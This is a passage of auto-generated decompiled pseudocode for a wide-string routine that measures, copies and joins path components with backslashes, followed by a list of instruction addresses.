				signed int _t364;
				unsigned int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t374;
				void* _t382;
				signed int _t384;
				signed int _t385;
				signed int _t389;
				signed int _t390;
				unsigned int _t405;
				signed int _t406;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed short* _t414;
				signed int _t418;
				unsigned int _t419;
				signed int _t421;
				unsigned int _t429;
				void* _t433;
				signed int _t434;
				signed int _t435;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int* _t445;
				unsigned int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t458;
				signed int _t465;
				unsigned int _t467;
				signed int _t468;
				signed int _t471;
				void* _t473;
				void* _t474;

				_t473 = (_t471 & 0xfffffff0) - 0x34;
				E6EA0D980(__ecx,  &_v60, 0x2f);
				_t294 = E6EA0E7D0( &_v60);
				_t445 = _a4;
				_t316 =  *_t294;
				if(_t316 != 0) {
					_t364 =  *( *( *(_t294 + 4)));
					__eflags = _t364;
					if(_t364 == 0) {
						L37:
						_push(0x80);
						_t418 = E6EA01030();
						_t473 = _t473 + 4;
						 *_t418 = 0;
						__eflags =  *_t294 - 1;
						if( *_t294 <= 1) {
							L70:
							 *_t445 = 0;
							_t445[1] = 0;
							__eflags = _t418;
							if(_t418 == 0) {
								L105:
								_push(0x80);
								_t295 = E6EA01030();
								_t473 = _t473 + 4;
								_t317 =  *_t445;
								__eflags = _t317;
								if(_t317 == 0) {
									__eflags = 0;
									 *_t295 = 0;
									L113:
									 *_t445 = _t295;
									_t445[1] = 0x40;
									L114:
									_push(2);
									_push(_t418);
									E6EA010B0();
									_t474 = _t473 + 8;
									L115:
									_t419 = _v60;
									_v60 = 0;
									_v52 = 0;
									_t369 = _v56;
									if(_t419 <= 0) {
										L127:
										_push(4);
										_push(_t369);
										E6EA010B0();
										_v56 = 0;
										return _t445;
									}
									_t225 = _t419 >> 1;
									if(_t225 == 0) {
										_t297 = 1;
										L124:
										if(_t297 - 1 < _t419) {
											_t319 =  *((intOrPtr*)(_t369 + _t297 * 4 - 4));
											if( *((intOrPtr*)(_t369 + _t297 * 4 - 4)) != 0) {
												_push(1);
												E6EA087E0(_t319);
												_t369 = _v60;
											}
										}
										goto L127;
									}
									_t298 = 0;
									_t447 = _t225;
									do {
										_t320 =  *((intOrPtr*)(_t369 + _t298 * 8));
										if( *((intOrPtr*)(_t369 + _t298 * 8)) != 0) {
											_push(1);
											E6EA087E0(_t320);
											_t369 = _v60;
										}
										_t321 =  *((intOrPtr*)(_t369 + 4 + _t298 * 8));
										if( *((intOrPtr*)(_t369 + 4 + _t298 * 8)) != 0) {
											_push(1);
											E6EA087E0(_t321);
											_t369 = _v60;
										}
										_t298 = _t298 + 1;
									} while (_t298 < _t447);
									_t445 = _a4;
									_t297 = _t298 + _t298 + 1;
									goto L124;
								}
								__eflags = _t295;
								if(_t295 == 0) {
									L111:
									_push(2);
									_push(_t317);
									E6EA010B0();
									_t473 = _t473 + 8;
									goto L113;
								}
								_t370 =  *_t317 & 0x0000ffff;
								 *_t295 = _t370;
								__eflags = _t370;
								if(_t370 == 0) {
									goto L111;
								}
								_t371 = 0;
								__eflags = 0;
								while(1) {
									_t371 = _t371 + 1;
									_t230 =  *(_t317 + _t371 * 4 - 2) & 0x0000ffff;
									 *(_t295 + _t371 * 4 - 2) = _t230;
									__eflags = _t230;
									if(_t230 == 0) {
										goto L111;
									}
									_t231 =  *(_t317 + _t371 * 4) & 0x0000ffff;
									 *(_t295 + _t371 * 4) = _t231;
									__eflags = _t231;
									if(_t231 != 0) {
										continue;
									}
									goto L111;
								}
								goto L111;
							}
							L71:
							__eflags =  *_t418 & 0x0000ffff;
							if(( *_t418 & 0x0000ffff) == 0) {
								goto L105;
							}
							_t374 = _t418 & 0x0000000f;
							__eflags = _t374;
							if(_t374 == 0) {
								L77:
								asm("pxor xmm0, xmm0");
								_t304 =  ~( ~_t374 + 0x00000007 & 0x00000007) + 0x7fffffff;
								__eflags = _t304;
								while(1) {
									asm("movdqu xmm1, [edi+edx*2]");
									asm("pcmpeqw xmm1, xmm0");
									asm("pmovmskb ecx, xmm1");
									__eflags = _t316;
									if(_t316 != 0) {
										break;
									}
									_t374 = _t374 + 8;
									__eflags = _t374 - _t304;
									if(_t374 < _t304) {
										continue;
									}
									__eflags = _t304 - 0x7fffffff;
									if(_t304 >= 0x7fffffff) {
										L83:
										_t304 = 0x7fffffff;
										L84:
										_t82 = _t304 + 1; // 0x80000000
										_t232 = _t82;
										__eflags = _t232 - 0x40;
										_t233 =  <=  ? 0x40 : _t232;
										__eflags = _t233;
										if(_t233 > 0) {
											_t326 = (_t233 >> 5 >> 0x1a) + _t233 >> 6;
											_t234 = _t233 & 0x8000003f;
											__eflags = _t234;
											if(_t234 < 0) {
												_t234 = (_t234 - 0x00000001 | 0xffffffc0) + 1;
												__eflags = _t234;
											}
											__eflags = _t234;
											_t327 = _t326 + (0 | _t234 > 0x00000000);
											_v64 = _t327 << 6;
											_push(_t327 << 7);
											_t235 = E6EA01030();
											_t473 = _t473 + 4;
											_t329 =  *_t445;
											__eflags = _t329;
											if(_t329 == 0) {
												__eflags = 0;
												 *_t235 = 0;
												goto L97;
											} else {
												__eflags = _t235;
												if(_t235 == 0) {
													L95:
													_push(2);
													_push(_t329);
													_v68 = _t235;
													E6EA010B0();
													_t235 = _v68;
													_t473 = _t473 + 8;
													L97:
													_t445[1] = _v64;
													 *_t445 = _t235;
													L98:
													_t330 = _t418;
													__eflags = _t235;
													if(_t235 == 0) {
														goto L114;
													}
													_t382 = 0;
													while(1) {
														_t448 =  *_t330 & 0x0000ffff;
														_t382 = _t382 + 1;
														 *_t235 = _t448;
														__eflags = _t304;
														if(_t304 == 0) {
															goto L103;
														}
														__eflags = _t382 - _t304;
														if(_t382 == _t304) {
															_t445 = _a4;
															 *(_t235 + 2) = 0;
															goto L114;
														}
														L103:
														__eflags = _t448;
														if(_t448 == 0) {
															_t445 = _a4;
															goto L114;
														}
														_t235 = _t235 + 2;
														_t330 = _t330 + 2;
														__eflags = _t330;
													}
												}
												_t384 =  *_t329 & 0x0000ffff;
												 *_t235 = _t384;
												__eflags = _t384;
												if(_t384 == 0) {
													goto L95;
												}
												_t385 = 0;
												__eflags = 0;
												while(1) {
													_t385 = _t385 + 1;
													_t449 =  *(_t329 + _t385 * 4 - 2) & 0x0000ffff;
													 *(_t235 + _t385 * 4 - 2) = _t449;
													__eflags = _t449;
													if(_t449 == 0) {
														break;
													}
													_t450 =  *(_t329 + _t385 * 4) & 0x0000ffff;
													 *(_t235 + _t385 * 4) = _t450;
													__eflags = _t450;
													if(_t450 != 0) {
														continue;
													}
													break;
												}
												_t445 = _a4;
												goto L95;
											}
										}
										_t235 = 0;
										goto L98;
									} else {
										goto L81;
									}
									while(1) {
										L81:
										__eflags =  *(_t418 + _t304 * 2) & 0x0000ffff;
										if(( *(_t418 + _t304 * 2) & 0x0000ffff) == 0) {
											goto L84;
										}
										_t304 = _t304 + 1;
										__eflags = _t304 - 0x7fffffff;
										if(_t304 < 0x7fffffff) {
											continue;
										}
										goto L83;
									}
									goto L84;
								}
								asm("bsf ebx, ecx");
								_t304 = (_t304 >> 1) + _t374;
								goto L84;
							}
							_t304 = 0;
							__eflags = _t374 & 0x00000001;
							if((_t374 & 0x00000001) != 0) {
								goto L81;
							}
							_t374 =  ~_t374 + 0x10 >> 1;
							__eflags = _t374;
							while(1) {
								_t316 =  *(_t418 + _t304 * 2) & 0x0000ffff;
								__eflags = _t316;
								if(_t316 == 0) {
									goto L84;
								}
								_t304 = _t304 + 1;
								__eflags = _t304 - _t374;
								if(_t304 < _t374) {
									continue;
								}
								goto L77;
							}
							goto L84;
						}
						_v40 = 0x40;
						L39:
						__eflags = 1;
						_t389 = 1;
						_t241 = _t294;
						asm("pxor xmm0, xmm0");
						_t306 = 1;
						do {
							__eflags = _t418;
							if(_t418 == 0) {
								_t390 = 0;
								L205:
								_v32 = _t241;
								_t451 = _t390;
								L54:
								_t48 = _t451 + 2; // -2147483652
								_t331 = _t48;
								__eflags = _t331 - 0x40;
								_t332 =  <=  ? 0x40 : _t331;
								__eflags = _t332 - _v40;
								if(_t332 <= _v40) {
									L66:
									_t316 = 0;
									 *((short*)(_t418 + _t451 * 2)) = 0x5c;
									 *((short*)(_t418 + 2 + _t451 * 2)) = 0;
									_t452 = _v32;
									_t389 =  *( *( *((intOrPtr*)(_t452 + 4)) + _t306 * 4));
									__eflags = _t389;
									if(_t389 == 0) {
										goto L68;
									}
									_t316 =  *_t389 & 0x0000ffff;
									__eflags = _t316;
									if(_t316 != 0) {
										__eflags = _t389 - _t418;
										if(_t389 == _t418) {
											goto L68;
										}
										_t245 = _t389 & 0x0000000f;
										__eflags = _t245;
										if(_t245 == 0) {
											L134:
											asm("pxor xmm1, xmm1");
											_t465 =  ~( ~_t245 + 0x00000007 & 0x00000007) + 0x7fffffff;
											__eflags = _t465;
											while(1) {
												asm("movdqu xmm0, [edx+eax*2]");
												asm("pcmpeqw xmm0, xmm1");
												asm("pmovmskb ecx, xmm0");
												__eflags = _t316;
												if(_t316 != 0) {
													break;
												}
												_t245 = _t245 + 8;
												__eflags = _t245 - _t465;
												if(_t245 < _t465) {
													continue;
												}
												__eflags = _t465 - 0x7fffffff;
												if(_t465 >= 0x7fffffff) {
													L140:
													_t465 = 0x7fffffff;
													L141:
													__eflags = _t418;
													if(_t418 == 0) {
														_t246 = 0;
														L155:
														_t149 = _t246 + 1; // 0x80000000
														_t247 = _t465 + _t149;
														__eflags = _t247;
														if(_t247 != 0) {
															__eflags = _t247 - 0x40;
															_t248 =  <=  ? 0x40 : _t247;
															__eflags = _t248 - _v40;
															if(_t248 <= _v40) {
																L173:
																_t249 = _t418;
																__eflags = _t418;
																if(_t418 == 0) {
																	L204:
																	_t241 = _v32;
																	_t390 = 0;
																	_t306 = _t306 + 1;
																	__eflags = _t306 -  *_t241;
																	if(_t306 >=  *_t241) {
																		_t445 = _a4;
																		 *_t445 = 0;
																		_t445[1] = 0;
																		goto L105;
																	}
																	goto L205;
																}
																_t334 =  *_t418 & 0x0000ffff;
																L175:
																__eflags = _t334;
																if(_t334 == 0) {
																	L180:
																	_t335 = _t249;
																	__eflags = _t465;
																	if(__eflags != 0) {
																		if(__eflags <= 0) {
																			L187:
																			_t316 = _v32;
																			_t389 = 0;
																			 *_t249 = 0;
																			_t306 = _t306 + 1;
																			__eflags = _t306 -  *_t316;
																			if(_t306 <  *_t316) {
																				L42:
																				_t243 = _t418 & 0x0000000f;
																				__eflags = _t243;
																				if(_t243 == 0) {
																					L47:
																					asm("pxor xmm1, xmm1");
																					_t458 =  ~( ~_t243 + 0x00000007 & 0x00000007) + 0x7fffffff;
																					__eflags = _t458;
																					while(1) {
																						asm("movdqu xmm0, [edi+eax*2]");
																						asm("pcmpeqw xmm0, xmm1");
																						asm("pmovmskb edx, xmm0");
																						__eflags = _t389;
																						if(_t389 != 0) {
																							break;
																						}
																						_t243 = _t243 + 8;
																						__eflags = _t243 - _t458;
																						if(_t243 < _t458) {
																							continue;
																						}
																						__eflags = _t458 - 0x7fffffff;
																						if(_t458 >= 0x7fffffff) {
																							L53:
																							_t451 = 0x7fffffff;
																							goto L54;
																						} else {
																							goto L51;
																						}
																						while(1) {
																							L51:
																							__eflags =  *(_t418 + _t458 * 2) & 0x0000ffff;
																							if(( *(_t418 + _t458 * 2) & 0x0000ffff) == 0) {
																								break;
																							}
																							_t458 = _t458 + 1;
																							__eflags = _t458 - 0x7fffffff;
																							if(_t458 < 0x7fffffff) {
																								continue;
																							}
																							goto L53;
																						}
																						L196:
																						__eflags = _t451 - 0xfffffffe;
																						if(_t451 == 0xfffffffe) {
																							 *_t418 = 0;
																						}
																						goto L54;
																					}
																					asm("bsf esi, edx");
																					_t451 = (_t458 >> 1) + _t243;
																					goto L196;
																				}
																				_t458 = 0;
																				__eflags = _t243 & 0x00000001;
																				if((_t243 & 0x00000001) != 0) {
																					goto L51;
																				}
																				_t243 =  ~_t243 + 0x10 >> 1;
																				__eflags = _t243;
																				while(1) {
																					_t389 =  *(_t418 + _t458 * 2) & 0x0000ffff;
																					__eflags = _t389;
																					if(_t389 == 0) {
																						goto L196;
																					}
																					_t458 = _t458 + 1;
																					__eflags = _t458 - _t243;
																					if(_t458 < _t243) {
																						continue;
																					}
																					goto L47;
																				}
																				goto L196;
																			}
																			_t445 = _a4;
																			L192:
																			 *_t445 = 0;
																			_t445[1] = 0;
																			goto L71;
																		}
																		L183:
																		_v48 = 0;
																		_v44 = _t418;
																		_v28 = _t306;
																		_t421 = _v48;
																		while(1) {
																			_t307 =  *(_t389 + _t421 * 2) & 0x0000ffff;
																			 *(_t335 + _t421 * 2) = _t307;
																			__eflags = _t307;
																			if(_t307 == 0) {
																				break;
																			}
																			_t190 = _t421 * 2; // 0x2
																			_t249 = _t335 + _t190 + 2;
																			_t421 = _t421 + 1;
																			__eflags = _t421 - _t465;
																			if(_t421 < _t465) {
																				continue;
																			}
																			break;
																		}
																		_t306 = _v28;
																		_t418 = _v44;
																		goto L187;
																	}
																	_t465 = 0x7fffffff;
																	goto L183;
																}
																_v36 = _t389;
																_t336 = 0;
																__eflags = 0;
																_v28 = _t306;
																while(1) {
																	_t336 = _t336 + 1;
																	_t308 = _t418 + _t336 * 4;
																	_t249 = _t308 - 2;
																	__eflags =  *(_t308 - 2) & 0x0000ffff;
																	if(( *(_t308 - 2) & 0x0000ffff) == 0) {
																		break;
																	}
																	_t249 = _t308;
																	__eflags =  *_t308 & 0x0000ffff;
																	if(( *_t308 & 0x0000ffff) != 0) {
																		continue;
																	}
																	break;
																}
																_t389 = _v36;
																_t306 = _v28;
																goto L180;
															}
															L161:
															_t341 = (_t248 >> 5 >> 0x1a) + _t248 >> 6;
															_t250 = _t248 & 0x8000003f;
															__eflags = _t250;
															if(_t250 < 0) {
																_t250 = (_t250 - 0x00000001 | 0xffffffc0) + 1;
																__eflags = _t250;
															}
															__eflags = _t250;
															_t342 = _t341 + (0 | _t250 > 0x00000000);
															_v40 = _t342 << 6;
															_push(_t342 << 7);
															_v36 = _t389;
															_t255 = E6EA01030();
															_t389 = _v36;
															_t344 = _t255;
															_t473 = _t473 + 4;
															__eflags = _t418;
															if(_t418 == 0) {
																__eflags = 0;
																 *_t344 = 0;
																goto L172;
															} else {
																__eflags = _t344;
																if(_t344 == 0) {
																	L170:
																	_push(2);
																	_push(_t418);
																	_v68 = _t344;
																	_v36 = _t389;
																	E6EA010B0();
																	_t389 = _v36;
																	_t344 = _v68;
																	_t473 = _t473 + 8;
																	L172:
																	_t418 = _t344;
																	goto L173;
																}
																_t257 =  *_t418 & 0x0000ffff;
																 *_t344 = _t257;
																__eflags = _t257;
																if(_t257 == 0) {
																	goto L170;
																}
																_v28 = _t306;
																_t258 = 0;
																__eflags = 0;
																while(1) {
																	_t258 = _t258 + 1;
																	_t309 =  *(_t418 + _t258 * 4 - 2) & 0x0000ffff;
																	 *(_t344 + _t258 * 4 - 2) = _t309;
																	__eflags = _t309;
																	if(_t309 == 0) {
																		break;
																	}
																	_t310 =  *(_t418 + _t258 * 4) & 0x0000ffff;
																	 *(_t344 + _t258 * 4) = _t310;
																	__eflags = _t310;
																	if(_t310 != 0) {
																		continue;
																	}
																	break;
																}
																_t306 = _v28;
																goto L170;
															}
														}
														__eflags = _t418;
														if(_t418 == 0) {
															__eflags = _v40 - 0x40;
															if(_v40 < 0x40) {
																L159:
																_t248 = 0x40;
																goto L161;
															}
															goto L204;
														}
														_t334 = 0;
														 *_t418 = 0;
														__eflags = _v40 - 0x40;
														if(_v40 < 0x40) {
															goto L159;
														}
														_t249 = _t418;
														goto L175;
													}
													_t346 = _t418 & 0x0000000f;
													__eflags = _t346;
													if(_t346 == 0) {
														L148:
														asm("pxor xmm1, xmm1");
														_v28 = _t306;
														_t246 =  ~( ~_t346 + 0x00000007 & 0x00000007) + 0x7fffffff;
														__eflags = _t246;
														while(1) {
															asm("movdqu xmm0, [edi+ecx*2]");
															asm("pcmpeqw xmm0, xmm1");
															asm("pmovmskb ebx, xmm0");
															__eflags = _t306;
															if(_t306 != 0) {
																break;
															}
															_t346 = _t346 + 8;
															__eflags = _t346 - _t246;
															if(_t346 < _t246) {
																continue;
															}
															_t306 = _v28;
															__eflags = _t246 - 0x7fffffff;
															if(_t246 >= 0x7fffffff) {
																L154:
																_t246 = 0x7fffffff;
																goto L155;
															} else {
																goto L152;
															}
															while(1) {
																L152:
																__eflags =  *(_t418 + _t246 * 2) & 0x0000ffff;
																if(( *(_t418 + _t246 * 2) & 0x0000ffff) == 0) {
																	goto L155;
																}
																_t246 = _t246 + 1;
																__eflags = _t246 - 0x7fffffff;
																if(_t246 < 0x7fffffff) {
																	continue;
																}
																goto L154;
															}
															goto L155;
														}
														asm("bsf eax, eax");
														_t267 = _t306 >> 1;
														_t306 = _v28;
														_t246 = _t267 + _t346;
														goto L155;
													}
													_t246 = 0;
													__eflags = _t346 & 0x00000001;
													if((_t346 & 0x00000001) != 0) {
														goto L152;
													}
													_t346 =  ~_t346 + 0x10 >> 1;
													__eflags = _t346;
													_v28 = _t306;
													while(1) {
														__eflags =  *(_t418 + _t246 * 2) & 0x0000ffff;
														if(( *(_t418 + _t246 * 2) & 0x0000ffff) == 0) {
															break;
														}
														_t246 = _t246 + 1;
														__eflags = _t246 - _t346;
														if(_t246 < _t346) {
															continue;
														}
														_t306 = _v28;
														goto L148;
													}
													_t306 = _v28;
													goto L155;
												} else {
													goto L138;
												}
												while(1) {
													L138:
													__eflags =  *(_t389 + _t465 * 2) & 0x0000ffff;
													if(( *(_t389 + _t465 * 2) & 0x0000ffff) == 0) {
														goto L141;
													}
													_t465 = _t465 + 1;
													__eflags = _t465 - 0x7fffffff;
													if(_t465 < 0x7fffffff) {
														continue;
													}
													goto L140;
												}
												goto L141;
											}
											asm("bsf esi, ecx");
											_t465 = (_t465 >> 1) + _t245;
											goto L141;
										}
										_t465 = 0;
										__eflags = _t245 & 0x00000001;
										if((_t245 & 0x00000001) != 0) {
											goto L138;
										}
										_t245 =  ~_t245 + 0x10 >> 1;
										__eflags = _t245;
										while(1) {
											_t316 =  *(_t389 + _t465 * 2) & 0x0000ffff;
											__eflags = _t316;
											if(_t316 == 0) {
												goto L141;
											}
											_t465 = _t465 + 1;
											__eflags = _t465 - _t245;
											if(_t465 < _t245) {
												continue;
											}
											goto L134;
										}
										goto L141;
									}
									goto L68;
								}
								_t405 = (_t332 >> 5 >> 0x1a) + _t332 >> 6;
								_t351 = _t332 & 0x8000003f;
								__eflags = _t351;
								if(_t351 < 0) {
									_t351 = (_t351 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t351;
								}
								__eflags = _t351;
								_t406 = _t405 + (0 | _t351 > 0x00000000);
								_v40 = _t406 << 6;
								_push(_t406 << 7);
								_t272 = E6EA01030();
								_t473 = _t473 + 4;
								__eflags = _t418;
								if(_t418 == 0) {
									__eflags = 0;
									 *_t272 = 0;
									goto L65;
								} else {
									__eflags = _t272;
									if(_t272 == 0) {
										L63:
										_push(2);
										_push(_t418);
										_v64 = _t272;
										E6EA010B0();
										_t272 = _v64;
										_t473 = _t473 + 8;
										L65:
										_t418 = _t272;
										goto L66;
									}
									_t409 =  *_t418 & 0x0000ffff;
									 *_t272 = _t409;
									__eflags = _t409;
									if(_t409 == 0) {
										goto L63;
									}
									_t410 = 0;
									__eflags = 0;
									while(1) {
										_t410 = _t410 + 1;
										_t354 =  *(_t418 + _t410 * 4 - 2) & 0x0000ffff;
										 *(_t272 + _t410 * 4 - 2) = _t354;
										__eflags = _t354;
										if(_t354 == 0) {
											goto L63;
										}
										_t355 =  *(_t418 + _t410 * 4) & 0x0000ffff;
										 *(_t272 + _t410 * 4) = _t355;
										__eflags = _t355;
										if(_t355 != 0) {
											continue;
										}
										goto L63;
									}
									goto L63;
								}
							}
							_v32 = _t241;
							goto L42;
							L68:
							_t241 = _t452;
							_t306 = _t306 + 1;
							__eflags = _t306 -  *_t241;
						} while (_t306 <  *_t241);
						_t445 = _a4;
						goto L70;
					}
					__eflags =  *_t364 & 0x0000ffff;
					if(( *_t364 & 0x0000ffff) == 0) {
						goto L37;
					}
					_t277 = _t364 & 0x0000000f;
					__eflags = _t277;
					if(_t277 == 0) {
						L18:
						asm("pxor xmm0, xmm0");
						_t429 =  ~( ~_t277 + 0x00000007 & 0x00000007) + 0x7fffffff;
						__eflags = _t429;
						_v64 = _t429;
						_t467 = _t429;
						while(1) {
							asm("movdqu xmm1, [edx+eax*2]");
							asm("pcmpeqw xmm1, xmm0");
							asm("pmovmskb edi, xmm1");
							__eflags = _t429;
							if(_t429 != 0) {
								break;
							}
							_t277 = _t277 + 8;
							__eflags = _t277 - _t467;
							if(_t277 < _t467) {
								continue;
							}
							_v64 = _t467;
							_t445 = _a4;
							__eflags = _v64 - 0x7fffffff;
							if(_v64 >= 0x7fffffff) {
								L25:
								_v64 = 0x7fffffff;
								L26:
								_t433 = _v64 + 1;
								__eflags = _t433 - 0x40;
								_t434 =  <=  ? 0x40 : _t433;
								__eflags = _t434;
								if(_t434 > 0) {
									_t283 = (_t434 >> 5 >> 0x1a) + _t434 >> 6;
									_t435 = _t434 & 0x8000003f;
									__eflags = _t435;
									if(_t435 < 0) {
										_t435 = (_t435 - 0x00000001 | 0xffffffc0) + 1;
										__eflags = _t435;
									}
									__eflags = _t435;
									_t284 = _t283 + (0 | _t435 > 0x00000000);
									_v40 = _t284 << 6;
									_push(_t284 << 7);
									_v68 = _t364;
									_t286 = E6EA01030();
									_t411 = _v68;
									_t473 = _t473 + 4;
									_t418 = _t286;
									 *_t286 = 0;
									_v32 = _t294;
									_t468 = _v64;
									while(1) {
										_t312 =  *_t411 & 0x0000ffff;
										_t316 = 1;
										 *_t286 = _t312;
										__eflags = _t468;
										if(_t468 == 0) {
											goto L35;
										}
										__eflags = 1 - _t468;
										if(1 == _t468) {
											__eflags = 0;
											_t445 = _a4;
											_t294 = _v32;
											_t286[0] = 0;
											L191:
											__eflags =  *_t294 - 1;
											if( *_t294 > 1) {
												goto L39;
											}
											goto L192;
										}
										L35:
										__eflags = _t312;
										if(_t312 == 0) {
											_t445 = _a4;
											_t294 = _v32;
											goto L191;
										}
										_t286 =  &(_t286[0]);
										_t411 = _t411 + 2;
										__eflags = _t411;
									}
								}
								_t418 = 0;
								__eflags = _t316 - 1;
								if(_t316 <= 1) {
									goto L70;
								}
								_v40 = 0;
								goto L39;
							}
							L22:
							_t287 = _v64;
							while(1) {
								__eflags =  *(_t364 + _t287 * 2) & 0x0000ffff;
								if(( *(_t364 + _t287 * 2) & 0x0000ffff) == 0) {
									break;
								}
								_t287 = _t287 + 1;
								__eflags = _t287 - 0x7fffffff;
								if(_t287 < 0x7fffffff) {
									continue;
								}
								goto L25;
							}
							_v64 = _t287;
							goto L26;
						}
						asm("bsf edi, edi");
						_t445 = _a4;
						_v64 = (_t429 >> 1) + _t277;
						goto L26;
					}
					_t441 = 0;
					_v64 = 0;
					__eflags = _t277 & 0x00000001;
					if((_t277 & 0x00000001) != 0) {
						goto L22;
					}
					_t277 =  ~_t277 + 0x10 >> 1;
					__eflags = _t277;
					while(1) {
						__eflags =  *(_t364 + _t441 * 2) & 0x0000ffff;
						if(( *(_t364 + _t441 * 2) & 0x0000ffff) == 0) {
							break;
						}
						_t441 = _t441 + 1;
						__eflags = _t441 - _t277;
						if(_t441 < _t277) {
							continue;
						}
						goto L18;
					}
					_v64 = _t441;
					_t445 = _a4;
					goto L26;
				}
				_push(0x80);
				 *_t445 = 0;
				_t445[1] = 0;
				_t313 = E6EA01030();
				_t474 = _t473 + 4;
				_t414 =  *_t445;
				if(_t414 == 0) {
					__eflags = 0;
					 *_t313 = 0;
					L9:
					 *_t445 = _t313;
					_t445[1] = 0x40;
					goto L115;
				}
				if(_t313 == 0) {
					L7:
					_push(2);
					_push(_t414);
					E6EA010B0();
					_t474 = _t474 + 8;
					goto L9;
				}
				_t361 =  *_t414 & 0x0000ffff;
				 *_t313 = _t361;
				if(_t361 == 0) {
					goto L7;
				}
				_t362 = 0;
				while(1) {
					_t362 = _t362 + 1;
					_t442 =  *(_t414 + _t362 * 4 - 2) & 0x0000ffff;
					 *(_t313 + _t362 * 4 - 2) = _t442;
					if(_t442 == 0) {
						goto L7;
					}
					_t443 =  *(_t414 + _t362 * 4) & 0x0000ffff;
					 *(_t313 + _t362 * 4) = _t443;
					if(_t443 != 0) {
						continue;
					}
					goto L7;
				}
				goto L7;
			}

0x6ea0d039
0x6ea0d043
0x6ea0d04f
0x6ea0d051
0x6ea0d054
0x6ea0d058
0x6ea0d0c6
0x6ea0d0c8
0x6ea0d0ca
0x6ea0d214
0x6ea0d214
0x6ea0d21e
0x6ea0d220
0x6ea0d225
0x6ea0d228
0x6ea0d22b
0x6ea0d3a1
0x6ea0d3a3
0x6ea0d3a5
0x6ea0d3a8
0x6ea0d3aa
0x6ea0d507
0x6ea0d507
0x6ea0d511
0x6ea0d513
0x6ea0d516
0x6ea0d518
0x6ea0d51a
0x6ea0d554
0x6ea0d556
0x6ea0d559
0x6ea0d559
0x6ea0d55b
0x6ea0d562
0x6ea0d562
0x6ea0d564
0x6ea0d565
0x6ea0d56a
0x6ea0d56d
0x6ea0d56d
0x6ea0d573
0x6ea0d577
0x6ea0d57b
0x6ea0d581
0x6ea0d5dc
0x6ea0d5dc
0x6ea0d5de
0x6ea0d5df
0x6ea0d5e7
0x6ea0d5fa
0x6ea0d5fa
0x6ea0d585
0x6ea0d587
0x6ea0d8fb
0x6ea0d5c2
0x6ea0d5c7
0x6ea0d5c9
0x6ea0d5cf
0x6ea0d5d1
0x6ea0d5d3
0x6ea0d5d8
0x6ea0d5d8
0x6ea0d5cf
0x00000000
0x6ea0d5c7
0x6ea0d58d
0x6ea0d58f
0x6ea0d591
0x6ea0d591
0x6ea0d596
0x6ea0d598
0x6ea0d59a
0x6ea0d59f
0x6ea0d59f
0x6ea0d5a3
0x6ea0d5a9
0x6ea0d5ab
0x6ea0d5ad
0x6ea0d5b2
0x6ea0d5b2
0x6ea0d5b6
0x6ea0d5b7
0x6ea0d5bb
0x6ea0d5be
0x00000000
0x6ea0d5be
0x6ea0d51c
0x6ea0d51e
0x6ea0d547
0x6ea0d547
0x6ea0d549
0x6ea0d54a
0x6ea0d54f
0x00000000
0x6ea0d54f
0x6ea0d520
0x6ea0d523
0x6ea0d526
0x6ea0d528
0x00000000
0x00000000
0x6ea0d52a
0x6ea0d52a
0x6ea0d52c
0x6ea0d52c
0x6ea0d52d
0x6ea0d532
0x6ea0d537
0x6ea0d539
0x00000000
0x00000000
0x6ea0d53b
0x6ea0d53f
0x6ea0d543
0x6ea0d545
0x00000000
0x00000000
0x00000000
0x6ea0d545
0x00000000
0x6ea0d52c
0x6ea0d3b0
0x6ea0d3b3
0x6ea0d3b5
0x00000000
0x00000000
0x6ea0d3bd
0x6ea0d3bd
0x6ea0d3c0
0x6ea0d3dd
0x6ea0d3e1
0x6ea0d3ed
0x6ea0d3ed
0x6ea0d3f3
0x6ea0d3f3
0x6ea0d3f8
0x6ea0d3fc
0x6ea0d400
0x6ea0d402
0x00000000
0x00000000
0x6ea0d408
0x6ea0d40b
0x6ea0d40d
0x00000000
0x00000000
0x6ea0d40f
0x6ea0d415
0x6ea0d428
0x6ea0d428
0x6ea0d42d
0x6ea0d432
0x6ea0d432
0x6ea0d435
0x6ea0d438
0x6ea0d43b
0x6ea0d43d
0x6ea0d450
0x6ea0d453
0x6ea0d453
0x6ea0d458
0x6ea0d460
0x6ea0d460
0x6ea0d460
0x6ea0d463
0x6ea0d468
0x6ea0d472
0x6ea0d476
0x6ea0d477
0x6ea0d47c
0x6ea0d47f
0x6ea0d481
0x6ea0d483
0x6ea0d4c8
0x6ea0d4ca
0x00000000
0x6ea0d485
0x6ea0d485
0x6ea0d487
0x6ea0d4b3
0x6ea0d4b3
0x6ea0d4b5
0x6ea0d4b6
0x6ea0d4ba
0x6ea0d4bf
0x6ea0d4c3
0x6ea0d4cd
0x6ea0d4d1
0x6ea0d4d4
0x6ea0d4d6
0x6ea0d4d6
0x6ea0d4d8
0x6ea0d4da
0x00000000
0x00000000
0x6ea0d4e0
0x6ea0d4ea
0x6ea0d4ea
0x6ea0d4ed
0x6ea0d4ee
0x6ea0d4f1
0x6ea0d4f3
0x00000000
0x00000000
0x6ea0d4f5
0x6ea0d4f7
0x6ea0d8db
0x6ea0d8de
0x00000000
0x6ea0d8de
0x6ea0d4fd
0x6ea0d4fd
0x6ea0d4ff
0x6ea0d8e7
0x00000000
0x6ea0d8e7
0x6ea0d4e4
0x6ea0d4e7
0x6ea0d4e7
0x6ea0d4e7
0x6ea0d4ea
0x6ea0d489
0x6ea0d48c
0x6ea0d48f
0x6ea0d491
0x00000000
0x00000000
0x6ea0d493
0x6ea0d493
0x6ea0d495
0x6ea0d495
0x6ea0d496
0x6ea0d49b
0x6ea0d4a0
0x6ea0d4a2
0x00000000
0x00000000
0x6ea0d4a4
0x6ea0d4a8
0x6ea0d4ac
0x6ea0d4ae
0x00000000
0x00000000
0x00000000
0x6ea0d4ae
0x6ea0d4b0
0x00000000
0x6ea0d4b0
0x6ea0d483
0x6ea0d43f
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0d417
0x6ea0d417
0x6ea0d41b
0x6ea0d41d
0x00000000
0x00000000
0x6ea0d41f
0x6ea0d420
0x6ea0d426
0x00000000
0x00000000
0x00000000
0x6ea0d426
0x00000000
0x6ea0d417
0x6ea0d8ef
0x6ea0d8f4
0x00000000
0x6ea0d8f4
0x6ea0d3c2
0x6ea0d3c4
0x6ea0d3c7
0x00000000
